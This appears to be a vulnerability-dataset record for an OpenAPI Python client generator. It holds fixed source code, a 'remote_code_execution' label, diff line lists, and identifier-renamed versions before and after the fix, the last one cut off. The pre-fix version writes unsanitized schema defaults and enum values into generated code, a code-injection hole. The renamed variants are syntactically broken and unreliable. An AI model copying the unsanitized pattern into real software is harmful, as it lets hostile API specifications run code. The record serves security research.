imports = super().get_imports(prefix=prefix)
imports.add("from typing import Dict")
if self.default is not None:
imports.add("from dataclasses import field")
imports.add("from typing import cast")
return imports
def _string_based_property(
name: str, required: bool, data: oai.Schema
) -> Union[StringProperty, DateProperty, DateTimeProperty, FileProperty]:
""" Construct a Property from the type "string" """
string_format = data.schema_format
if string_format == "date-time":
return DateTimeProperty(name=name, required=required, default=data.default)
elif string_format == "date":
return DateProperty(name=name, required=required, default=data.default)
elif string_format == "binary":
return FileProperty(name=name, required=required, default=data.default)
else:
return StringProperty(name=name, default=data.default, required=required, pattern=data.pattern)
def property_from_data(
name: str, required: bool, data: Union[oai.Reference, oai.Schema]
) -> Union[Property, PropertyError]:
""" Generate a Property from the OpenAPI dictionary representation of it """
if isinstance(data, oai.Reference):
return RefProperty(name=name, required=required, reference=Reference.from_ref(data.ref), default=None)
if data.enum:
return EnumProperty(
name=name,
required=required,
values=EnumProperty.values_from_list(data.enum),
title=data.title or name,
default=data.default,
)
if data.anyOf:
sub_properties: List[Property] = []
for sub_prop_data in data.anyOf:
sub_prop = property_from_data(name=name, required=required, data=sub_prop_data)
if isinstance(sub_prop, PropertyError):
return PropertyError(detail=f"Invalid property in union {name}", data=sub_prop_data)
sub_properties.append(sub_prop)
return UnionProperty(name=name, required=required, default=data.default, inner_properties=sub_properties)
if not data.type:
return PropertyError(data=data, detail="Schemas must either have one of enum, anyOf, or type defined.")
if data.type == "string":
return _string_based_property(name=name, required=required, data=data)
elif data.type == "number":
return FloatProperty(name=name, default=data.default, required=required)
elif data.type == "integer":
return IntProperty(name=name, default=data.default, required=required)
elif data.type == "boolean":
return BooleanProperty(name=name, required=required, default=data.default)
elif data.type == "array":
if data.items is None:
return PropertyError(data=data, detail="type array must have items defined")
inner_prop = property_from_data(name=f"{name}_item", required=True, data=data.items)
if isinstance(inner_prop, PropertyError):
return PropertyError(data=inner_prop.data, detail=f"invalid data in items of array {name}")
return ListProperty(name=name, required=required, default=data.default, inner_property=inner_prop,)
elif data.type == "object":
return DictProperty(name=name, required=required, default=data.default)
return PropertyError(data=data, detail=f"unknown type {data.type}")
| from __future__ import annotations
from dataclasses import InitVar, dataclass, field
from datetime import date, datetime
from typing import Any, ClassVar, Dict, Generic, List, Optional, Set, TypeVar, Union
from .. import schema as oai
from .. import utils
from .errors import PropertyError, ValidationError
from .reference import Reference
@dataclass
class Property:
"""
Describes a single property for a schema
Attributes:
template: Name of the template file (if any) to use for this property. Must be stored in
templates/property_templates and must contain two macros: construct and transform. Construct will be used to
build this property from JSON data (a response from an API). Transform will be used to convert this property
to JSON data (when sending a request to the API).
Raises:
ValidationError: Raised when the default value fails to be converted to the expected type
"""
name: str
required: bool
default: Optional[Any]
template: ClassVar[Optional[str]] = None
_type_string: ClassVar[str]
python_name: str = field(init=False)
def __post_init__(self) -> None:
self.python_name = utils.snake_case(self.name)
if self.default is not None:
self.default = self._validate_default(default=self.default)
def _validate_default(self, default: Any) -> Any:
""" Check that the default value is valid for the property's type + perform any necessary sanitization """
raise ValidationError
def get_type_string(self, no_optional: bool = False) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required or no_optional:
return self._type_string
return f"Optional[{self._type_string}]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
if not self.required:
return {"from typing import Optional"}
return set()
def to_string(self) -> str:
""" How this should be declared in a dataclass """
if self.default:
default = self.default
elif not self.required:
default = "None"
else:
default = None
if default is not None:
return f"{self.python_name}: {self.get_type_string()} = {self.default}"
else:
return f"{self.python_name}: {self.get_type_string()}"
@dataclass
class StringProperty(Property):
""" A property of type str """
max_length: Optional[int] = None
pattern: Optional[str] = None
_type_string: ClassVar[str] = "str"
def _validate_default(self, default: Any) -> str:
return f'"{utils.remove_string_escapes(default)}"'
@dataclass
class DateTimeProperty(Property):
"""
A property of type datetime.datetime
"""
_type_string: ClassVar[str] = "datetime.datetime"
template: ClassVar[str] = "datetime_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update({"import datetime", "from typing import cast"})
return imports
def _validate_default(self, default: Any) -> str:
for format_string in ("%Y-%m-%dT%H:%M:%S", "%Y-%m-%dT%H:%M:%S%z"):
try:
return repr(datetime.strptime(default, format_string))
except (TypeError, ValueError):
continue
raise ValidationError
@dataclass
class DateProperty(Property):
""" A property of type datetime.date """
_type_string: ClassVar[str] = "datetime.date"
template: ClassVar[str] = "date_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update({"import datetime", "from typing import cast"})
return imports
def _validate_default(self, default: Any) -> str:
try:
return repr(date.fromisoformat(default))
except (TypeError, ValueError) as e:
raise ValidationError() from e
@dataclass
class FileProperty(Property):
""" A property used for uploading files """
_type_string: ClassVar[str] = "File"
template: ClassVar[str] = "file_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update({f"from {prefix}.types import File", "from dataclasses import astuple"})
return imports
@dataclass
class FloatProperty(Property):
""" A property of type float """
default: Optional[float] = None
_type_string: ClassVar[str] = "float"
def _validate_default(self, default: Any) -> float:
try:
return float(default)
except (TypeError, ValueError) as e:
raise ValidationError() from e
@dataclass
class IntProperty(Property):
""" A property of type int """
default: Optional[int] = None
_type_string: ClassVar[str] = "int"
def _validate_default(self, default: Any) -> int:
try:
return int(default)
except (TypeError, ValueError) as e:
raise ValidationError() from e
@dataclass
class BooleanProperty(Property):
""" Property for bool """
_type_string: ClassVar[str] = "bool"
def _validate_default(self, default: Any) -> bool:
# no try/except needed as anything that comes from the initial load from json/yaml will be boolable
return bool(default)
InnerProp = TypeVar("InnerProp", bound=Property)
@dataclass
class ListProperty(Property, Generic[InnerProp]):
""" A property representing a list (array) of other properties """
inner_property: InnerProp
template: ClassVar[str] = "list_property.pyi"
def get_type_string(self, no_optional: bool = False) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required or no_optional:
return f"List[{self.inner_property.get_type_string()}]"
return f"Optional[List[{self.inner_property.get_type_string()}]]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update(self.inner_property.get_imports(prefix=prefix))
imports.add("from typing import List")
if self.default is not None:
imports.add("from dataclasses import field")
imports.add("from typing import cast")
return imports
def _validate_default(self, default: Any) -> str:
if not isinstance(default, list):
raise ValidationError()
default = list(map(self.inner_property._validate_default, default))
if isinstance(self.inner_property, RefProperty): # Fix enums to use the actual value
default = str(default).replace("'", "")
return f"field(default_factory=lambda: cast({self.get_type_string()}, {default}))"
@dataclass
class UnionProperty(Property):
""" A property representing a Union (anyOf) of other properties """
inner_properties: List[Property]
template: ClassVar[str] = "union_property.pyi"
def get_type_string(self, no_optional: bool = False) -> str:
""" Get a string representation of type that should be used when declaring this property """
inner_types = [p.get_type_string() for p in self.inner_properties]
inner_prop_string = ", ".join(inner_types)
if self.required or no_optional:
return f"Union[{inner_prop_string}]"
return f"Optional[Union[{inner_prop_string}]]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
for inner_prop in self.inner_properties:
imports.update(inner_prop.get_imports(prefix=prefix))
imports.add("from typing import Union")
return imports
def _validate_default(self, default: Any) -> Any:
for property in self.inner_properties:
try:
val = property._validate_default(default)
return val
except ValidationError:
continue
raise ValidationError()
_existing_enums: Dict[str, EnumProperty] = {}
@dataclass
class EnumProperty(Property):
""" A property that should use an enum """
values: Dict[str, str]
reference: Reference = field(init=False)
title: InitVar[str]
template: ClassVar[str] = "enum_property.pyi"
def __post_init__(self, title: str) -> None: # type: ignore
reference = Reference.from_ref(title)
dedup_counter = 0
while reference.class_name in _existing_enums:
existing = _existing_enums[reference.class_name]
if self.values == existing.values:
break # This is the same Enum, we're good
dedup_counter += 1
reference = Reference.from_ref(f"{reference.class_name}{dedup_counter}")
self.reference = reference
super().__post_init__()
_existing_enums[self.reference.class_name] = self
@staticmethod
def get_all_enums() -> Dict[str, EnumProperty]:
""" Get all the EnumProperties that have been registered keyed by class name """
return _existing_enums
@staticmethod
def get_enum(name: str) -> Optional[EnumProperty]:
""" Get all the EnumProperties that have been registered keyed by class name """
return _existing_enums.get(name)
def get_type_string(self, no_optional: bool = False) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required or no_optional:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.add(f"from {prefix}.{self.reference.module_name} import {self.reference.class_name}")
return imports
@staticmethod
def values_from_list(values: List[str]) -> Dict[str, str]:
""" Convert a list of values into dict of {name: value} """
output: Dict[str, str] = {}
for i, value in enumerate(values):
if value[0].isalpha():
key = value.upper()
else:
key = f"VALUE_{i}"
if key in output:
raise ValueError(f"Duplicate key {key} in Enum")
sanitized_key = utils.fix_keywords(utils.sanitize(key))
output[sanitized_key] = utils.remove_string_escapes(value)
return output
def _validate_default(self, default: Any) -> str:
inverse_values = {v: k for k, v in self.values.items()}
try:
return f"{self.reference.class_name}.{inverse_values[default]}"
except KeyError as e:
raise ValidationError() from e
@dataclass
class RefProperty(Property):
""" A property which refers to another Schema """
reference: Reference
@property
def template(self) -> str: # type: ignore
enum = EnumProperty.get_enum(self.reference.class_name)
if enum:
return "enum_property.pyi"
return "ref_property.pyi"
def get_type_string(self, no_optional: bool = False) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required or no_optional:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update(
{
f"from {prefix}.{self.reference.module_name} import {self.reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
)
return imports
def _validate_default(self, default: Any) -> Any:
enum = EnumProperty.get_enum(self.reference.class_name)
if enum:
return enum._validate_default(default)
else:
raise ValidationError
@dataclass
class DictProperty(Property):
""" Property that is a general Dict """
_type_string: ClassVar[str] = "Dict[Any, Any]"
template: ClassVar[str] = "dict_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.add("from typing import Dict")
if self.default is not None:
imports.add("from dataclasses import field")
imports.add("from typing import cast")
return imports
def _validate_default(self, default: Any) -> str:
if isinstance(default, dict):
return repr(default)
raise ValidationError
def _string_based_property(
name: str, required: bool, data: oai.Schema
) -> Union[StringProperty, DateProperty, DateTimeProperty, FileProperty]:
""" Construct a Property from the type "string" """
string_format = data.schema_format
if string_format == "date-time":
return DateTimeProperty(name=name, required=required, default=data.default)
elif string_format == "date":
return DateProperty(name=name, required=required, default=data.default)
elif string_format == "binary":
return FileProperty(name=name, required=required, default=data.default)
else:
return StringProperty(name=name, default=data.default, required=required, pattern=data.pattern)
def _property_from_data(
name: str, required: bool, data: Union[oai.Reference, oai.Schema]
) -> Union[Property, PropertyError]:
""" Generate a Property from the OpenAPI dictionary representation of it """
name = utils.remove_string_escapes(name)
if isinstance(data, oai.Reference):
return RefProperty(name=name, required=required, reference=Reference.from_ref(data.ref), default=None)
if data.enum:
return EnumProperty(
name=name,
required=required,
values=EnumProperty.values_from_list(data.enum),
title=data.title or name,
default=data.default,
)
if data.anyOf:
sub_properties: List[Property] = []
for sub_prop_data in data.anyOf:
sub_prop = property_from_data(name=name, required=required, data=sub_prop_data)
if isinstance(sub_prop, PropertyError):
return PropertyError(detail=f"Invalid property in union {name}", data=sub_prop_data)
sub_properties.append(sub_prop)
return UnionProperty(name=name, required=required, default=data.default, inner_properties=sub_properties)
if not data.type:
return PropertyError(data=data, detail="Schemas must either have one of enum, anyOf, or type defined.")
if data.type == "string":
return _string_based_property(name=name, required=required, data=data)
elif data.type == "number":
return FloatProperty(name=name, default=data.default, required=required)
elif data.type == "integer":
return IntProperty(name=name, default=data.default, required=required)
elif data.type == "boolean":
return BooleanProperty(name=name, required=required, default=data.default)
elif data.type == "array":
if data.items is None:
return PropertyError(data=data, detail="type array must have items defined")
inner_prop = property_from_data(name=f"{name}_item", required=True, data=data.items)
if isinstance(inner_prop, PropertyError):
return PropertyError(data=inner_prop.data, detail=f"invalid data in items of array {name}")
return ListProperty(name=name, required=required, default=data.default, inner_property=inner_prop,)
elif data.type == "object":
return DictProperty(name=name, required=required, default=data.default)
return PropertyError(data=data, detail=f"unknown type {data.type}")
def property_from_data(
name: str, required: bool, data: Union[oai.Reference, oai.Schema]
) -> Union[Property, PropertyError]:
try:
return _property_from_data(name=name, required=required, data=data)
except ValidationError:
return PropertyError(detail="Failed to validate default value", data=data)
| remote_code_execution | {
"code": [
"from .errors import PropertyError",
" def get_type_string(self) -> str:",
" if self.required:",
" def __post_init__(self) -> None:",
" super().__post_init__()",
" if self.default is not None:",
" self.default = f'\"{self.default}\"'",
" _type_string: ClassVar[str] = \"datetime\"",
" imports.update({\"from datetime import datetime\", \"from typing import cast\"})",
" _type_string: ClassVar[str] = \"date\"",
" imports.update({\"from datetime import date\", \"from typing import cast\"})",
" def __post_init__(self) -> None:",
" super().__post_init__()",
" if self.default is not None:",
" self.default = f\"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))\"",
" def get_type_string(self) -> str:",
" if self.required:",
" def get_type_string(self) -> str:",
" if self.required:",
" super().__post_init__()",
" inverse_values = {v: k for k, v in self.values.items()}",
" if self.default is not None:",
" self.default = f\"{self.reference.class_name}.{inverse_values[self.default]}\"",
" def get_type_string(self) -> str:",
" if self.required:",
" output[key] = value",
" def get_type_string(self) -> str:",
" if self.required:",
" def __post_init__(self) -> None:",
" super().__post_init__()",
" if self.default is not None:",
" self.default = f\"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))\"",
"def property_from_data("
],
"line_no": [
8,
36,
38,
77,
78,
79,
80,
89,
100,
108,
119,
175,
176,
177,
178,
180,
182,
209,
213,
245,
256,
257,
258,
271,
274,
301,
319,
321,
349,
350,
351,
352,
384
]
} | {
"code": [
"from datetime import date, datetime",
"from .errors import PropertyError, ValidationError",
" Raises:",
" ValidationError: Raised when the default value fails to be converted to the expected type",
" if self.default is not None:",
" self.default = self._validate_default(default=self.default)",
" def _validate_default(self, default: Any) -> Any:",
" raise ValidationError",
" if self.required or no_optional:",
" return f'\"{utils.remove_string_escapes(default)}\"'",
" imports.update({\"import datetime\", \"from typing import cast\"})",
" def _validate_default(self, default: Any) -> str:",
" try:",
" except (TypeError, ValueError):",
" raise ValidationError",
" _type_string: ClassVar[str] = \"datetime.date\"",
" def _validate_default(self, default: Any) -> str:",
" try:",
" except (TypeError, ValueError) as e:",
" raise ValidationError() from e",
" try:",
" return float(default)",
" raise ValidationError() from e",
" try:",
" except (TypeError, ValueError) as e:",
" def _validate_default(self, default: Any) -> bool:",
" def get_type_string(self, no_optional: bool = False) -> str:",
" if self.required or no_optional:",
" def _validate_default(self, default: Any) -> str:",
" if not isinstance(default, list):",
" default = list(map(self.inner_property._validate_default, default))",
" default = str(default).replace(\"'\", \"\")",
" return f\"field(default_factory=lambda: cast({self.get_type_string()}, {default}))\"",
" def get_type_string(self, no_optional: bool = False) -> str:",
" if self.required or no_optional:",
" for property in self.inner_properties:",
" try:",
" val = property._validate_default(default)",
" except ValidationError:",
" raise ValidationError()",
" super().__post_init__()",
" if self.required or no_optional:",
" sanitized_key = utils.fix_keywords(utils.sanitize(key))",
" output[sanitized_key] = utils.remove_string_escapes(value)",
" inverse_values = {v: k for k, v in self.values.items()}",
" return f\"{self.reference.class_name}.{inverse_values[default]}\"",
" raise ValidationError() from e",
" def get_type_string(self, no_optional: bool = False) -> str:",
" if self.required or no_optional:",
" def _validate_default(self, default: Any) -> Any:",
" enum = EnumProperty.get_enum(self.reference.class_name)",
" if enum:",
" return enum._validate_default(default)",
" else:",
" raise ValidationError",
" template: ClassVar[str] = \"dict_property.pyi\"",
" def _validate_default(self, default: Any) -> str:",
" if isinstance(default, dict):",
" return repr(default)",
" raise ValidationError",
"def _property_from_data(",
" name = utils.remove_string_escapes(name)",
"def property_from_data(",
" name: str, required: bool, data: Union[oai.Reference, oai.Schema]",
") -> Union[Property, PropertyError]:",
" try:",
" return _property_from_data(name=name, required=required, data=data)",
" except ValidationError:",
" return PropertyError(detail=\"Failed to validate default value\", data=data)"
],
"line_no": [
4,
9,
24,
25,
39,
40,
42,
44,
48,
88,
108,
111,
113,
115,
117,
124,
138,
139,
141,
142,
172,
173,
175,
186,
188,
198,
213,
215,
234,
235,
238,
240,
242,
252,
256,
274,
275,
276,
278,
280,
307,
323,
350,
351,
356,
358,
360,
376,
378,
399,
400,
401,
402,
403,
404,
412,
428,
429,
430,
431,
449,
453,
494,
495,
496,
497,
498,
499,
500
]
} | from __future__ import annotations
from dataclasses import InitVar, dataclass, field
from typing import Any, ClassVar, Dict, Generic, List, Optional, Set, TypeVar, Union
from .. import schema as oai
from .. import utils
from .errors import .PropertyError
from .reference import Reference
@dataclass
class CLASS_0:
VAR_1: str
VAR_2: bool
VAR_16: Optional[Any]
FUNC_8: ClassVar[Optional[str]] = None
_type_string: ClassVar[str]
python_name: str = field(init=False)
def __post_init__(self) -> None:
self.python_name = utils.snake_case(self.name)
def FUNC_2(self) -> str:
if self.required:
return self._type_string
return f"Optional[{self._type_string}]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
if not self.required:
return {"from typing import Optional"}
return set()
def FUNC_4(self) -> str:
if self.default:
VAR_16 = self.default
elif not self.required:
VAR_16 = "None"
else:
VAR_16 = None
if VAR_16 is not None:
return f"{self.python_name}: {self.get_type_string()} = {self.default}"
else:
return f"{self.python_name}: {self.get_type_string()}"
@dataclass
class CLASS_1(CLASS_0):
max_length: Optional[int] = None
pattern: Optional[str] = None
_type_string: ClassVar[str] = "str"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f'"{self.default}"'
@dataclass
class CLASS_2(CLASS_0):
_type_string: ClassVar[str] = "datetime"
FUNC_8: ClassVar[str] = "datetime_property.pyi"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update({"from datetime import datetime", "from typing import cast"})
return VAR_8
@dataclass
class CLASS_3(CLASS_0):
_type_string: ClassVar[str] = "date"
FUNC_8: ClassVar[str] = "date_property.pyi"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update({"from datetime import date", "from typing import cast"})
return VAR_8
@dataclass
class CLASS_4(CLASS_0):
_type_string: ClassVar[str] = "File"
FUNC_8: ClassVar[str] = "file_property.pyi"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update({f"from {VAR_4}.types import File", "from dataclasses import astuple"})
return VAR_8
@dataclass
class CLASS_5(CLASS_0):
VAR_16: Optional[float] = None
_type_string: ClassVar[str] = "float"
@dataclass
class CLASS_6(CLASS_0):
VAR_16: Optional[int] = None
_type_string: ClassVar[str] = "int"
@dataclass
class CLASS_7(CLASS_0):
_type_string: ClassVar[str] = "bool"
VAR_0 = TypeVar("InnerProp", bound=CLASS_0)
@dataclass
class CLASS_8(CLASS_0, Generic[VAR_0]):
inner_property: VAR_0
FUNC_8: ClassVar[str] = "list_property.pyi"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))"
def FUNC_2(self) -> str:
if self.required:
return f"List[{self.inner_property.get_type_string()}]"
return f"Optional[List[{self.inner_property.get_type_string()}]]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update(self.inner_property.get_imports(VAR_4=prefix))
VAR_8.add("from typing import List")
if self.default is not None:
VAR_8.add("from dataclasses import field")
VAR_8.add("from typing import cast")
return VAR_8
@dataclass
class CLASS_9(CLASS_0):
inner_properties: List[CLASS_0]
FUNC_8: ClassVar[str] = "union_property.pyi"
def FUNC_2(self) -> str:
VAR_9 = [p.get_type_string() for p in self.inner_properties]
VAR_10 = ", ".join(VAR_9)
if self.required:
return f"Union[{VAR_10}]"
return f"Optional[Union[{VAR_10}]]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
for VAR_21 in self.inner_properties:
VAR_8.update(VAR_21.get_imports(VAR_4=prefix))
VAR_8.add("from typing import Union")
return VAR_8
VAR_14: Dict[str, CLASS_10] = {}
@dataclass
class CLASS_10(CLASS_0):
VAR_6: Dict[str, str]
VAR_11: Reference = field(init=False)
VAR_5: InitVar[str]
FUNC_8: ClassVar[str] = "enum_property.pyi"
def __post_init__(self, VAR_5: str) -> None: # type: ignore
super().__post_init__()
VAR_11 = Reference.from_ref(VAR_5)
VAR_12 = 0
while VAR_11.class_name in VAR_14:
VAR_17 = VAR_14[VAR_11.class_name]
if self.values == VAR_17.values:
break # This is the same Enum, we're good
VAR_12 += 1
VAR_11 = Reference.from_ref(f"{VAR_11.class_name}{VAR_12}")
self.reference = VAR_11
VAR_13 = {v: k for k, v in self.values.items()}
if self.default is not None:
self.default = f"{self.reference.class_name}.{VAR_13[self.default]}"
VAR_14[self.reference.class_name] = self
@staticmethod
def FUNC_5() -> Dict[str, CLASS_10]:
return VAR_14
@staticmethod
def FUNC_6(VAR_1: str) -> Optional[CLASS_10]:
return VAR_14.get(VAR_1)
def FUNC_2(self) -> str:
if self.required:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.add(f"from {VAR_4}.{self.reference.module_name} import {self.reference.class_name}")
return VAR_8
@staticmethod
def FUNC_7(VAR_6: List[str]) -> Dict[str, str]:
VAR_18: Dict[str, str] = {}
for i, value in enumerate(VAR_6):
if value[0].isalpha():
VAR_19 = value.upper()
else:
VAR_19 = f"VALUE_{i}"
if VAR_19 in VAR_18:
raise ValueError(f"Duplicate VAR_19 {key} in Enum")
VAR_18[VAR_19] = value
return VAR_18
@dataclass
class CLASS_11(CLASS_0):
VAR_11: Reference
@property
def FUNC_8(self) -> str: # type: ignore
VAR_15 = CLASS_10.get_enum(self.reference.class_name)
if VAR_15:
return "enum_property.pyi"
return "ref_property.pyi"
def FUNC_2(self) -> str:
if self.required:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update(
{
f"from {VAR_4}.{self.reference.module_name} import {self.reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
)
return VAR_8
@dataclass
class CLASS_12(CLASS_0):
_type_string: ClassVar[str] = "Dict[Any, Any]"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.add("from typing import Dict")
if self.default is not None:
VAR_8.add("from dataclasses import field")
VAR_8.add("from typing import cast")
return VAR_8
def FUNC_0(
VAR_1: str, VAR_2: bool, VAR_3: oai.Schema
) -> Union[CLASS_1, CLASS_3, CLASS_2, CLASS_4]:
VAR_7 = VAR_3.schema_format
if VAR_7 == "date-time":
return CLASS_2(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
elif VAR_7 == "date":
return CLASS_3(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
elif VAR_7 == "binary":
return CLASS_4(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
else:
return CLASS_1(VAR_1=name, VAR_16=VAR_3.default, VAR_2=required, pattern=VAR_3.pattern)
def FUNC_1(
VAR_1: str, VAR_2: bool, VAR_3: Union[oai.Reference, oai.Schema]
) -> Union[CLASS_0, PropertyError]:
if isinstance(VAR_3, oai.Reference):
return CLASS_11(VAR_1=name, VAR_2=required, VAR_11=Reference.from_ref(VAR_3.ref), VAR_16=None)
if VAR_3.enum:
return CLASS_10(
VAR_1=name,
VAR_2=required,
VAR_6=CLASS_10.values_from_list(VAR_3.enum),
VAR_5=VAR_3.title or VAR_1,
VAR_16=VAR_3.default,
)
if VAR_3.anyOf:
sub_properties: List[CLASS_0] = []
for sub_prop_data in VAR_3.anyOf:
VAR_20 = FUNC_1(VAR_1=name, VAR_2=required, VAR_3=sub_prop_data)
if isinstance(VAR_20, PropertyError):
return PropertyError(detail=f"Invalid property in union {VAR_1}", VAR_3=sub_prop_data)
sub_properties.append(VAR_20)
return CLASS_9(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default, inner_properties=sub_properties)
if not VAR_3.type:
return PropertyError(VAR_3=data, detail="Schemas must either have one of VAR_15, anyOf, or type defined.")
if VAR_3.type == "string":
return FUNC_0(VAR_1=name, VAR_2=required, VAR_3=data)
elif VAR_3.type == "number":
return CLASS_5(VAR_1=name, VAR_16=VAR_3.default, VAR_2=required)
elif VAR_3.type == "integer":
return CLASS_6(VAR_1=name, VAR_16=VAR_3.default, VAR_2=required)
elif VAR_3.type == "boolean":
return CLASS_7(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
elif VAR_3.type == "array":
if VAR_3.items is None:
return PropertyError(VAR_3=data, detail="type array must have items defined")
VAR_21 = FUNC_1(VAR_1=f"{VAR_1}_item", VAR_2=True, VAR_3=VAR_3.items)
if isinstance(VAR_21, PropertyError):
return PropertyError(VAR_3=VAR_21.data, detail=f"invalid VAR_3 in items of array {VAR_1}")
return CLASS_8(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default, inner_property=VAR_21,)
elif VAR_3.type == "object":
return CLASS_12(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
return PropertyError(VAR_3=data, detail=f"unknown type {VAR_3.type}")
| from __future__ import annotations
from dataclasses import InitVar, dataclass, field
from datetime import date, datetime
from typing import Any, ClassVar, Dict, Generic, List, Optional, Set, TypeVar, Union
from .. import schema as oai
from .. import utils
from .errors import .PropertyError, ValidationError
from .reference import Reference
@dataclass
class CLASS_0:
VAR_1: str
VAR_2: bool
VAR_4: Optional[Any]
FUNC_10: ClassVar[Optional[str]] = None
_type_string: ClassVar[str]
python_name: str = field(init=False)
def __post_init__(self) -> None:
self.python_name = utils.snake_case(self.name)
if self.default is not None:
self.default = self._validate_default(VAR_4=self.default)
def FUNC_3(self, VAR_4: Any) -> Any:
raise ValidationError
def FUNC_4(self, VAR_5: bool = False) -> str:
if self.required or VAR_5:
return self._type_string
return f"Optional[{self._type_string}]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
if not self.required:
return {"from typing import Optional"}
return set()
def FUNC_6(self) -> str:
if self.default:
VAR_4 = self.default
elif not self.required:
VAR_4 = "None"
else:
VAR_4 = None
if VAR_4 is not None:
return f"{self.python_name}: {self.get_type_string()} = {self.default}"
else:
return f"{self.python_name}: {self.get_type_string()}"
@dataclass
class CLASS_1(CLASS_0):
max_length: Optional[int] = None
pattern: Optional[str] = None
_type_string: ClassVar[str] = "str"
def FUNC_3(self, VAR_4: Any) -> str:
return f'"{utils.remove_string_escapes(VAR_4)}"'
@dataclass
class CLASS_2(CLASS_0):
_type_string: ClassVar[str] = "datetime.datetime"
FUNC_10: ClassVar[str] = "datetime_property.pyi"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update({"import datetime", "from typing import cast"})
return VAR_10
def FUNC_3(self, VAR_4: Any) -> str:
for format_string in ("%Y-%m-%dT%H:%M:%S", "%Y-%m-%dT%H:%M:%S%z"):
try:
return repr(datetime.strptime(VAR_4, format_string))
except (TypeError, ValueError):
continue
raise ValidationError
@dataclass
class CLASS_3(CLASS_0):
_type_string: ClassVar[str] = "datetime.date"
FUNC_10: ClassVar[str] = "date_property.pyi"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update({"import datetime", "from typing import cast"})
return VAR_10
def FUNC_3(self, VAR_4: Any) -> str:
try:
return repr(date.fromisoformat(VAR_4))
except (TypeError, ValueError) as e:
raise ValidationError() from e
@dataclass
class CLASS_4(CLASS_0):
_type_string: ClassVar[str] = "File"
FUNC_10: ClassVar[str] = "file_property.pyi"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update({f"from {VAR_6}.types import File", "from dataclasses import astuple"})
return VAR_10
@dataclass
class CLASS_5(CLASS_0):
VAR_4: Optional[float] = None
_type_string: ClassVar[str] = "float"
def FUNC_3(self, VAR_4: Any) -> float:
try:
return float(VAR_4)
except (TypeError, ValueError) as e:
raise ValidationError() from e
@dataclass
class CLASS_6(CLASS_0):
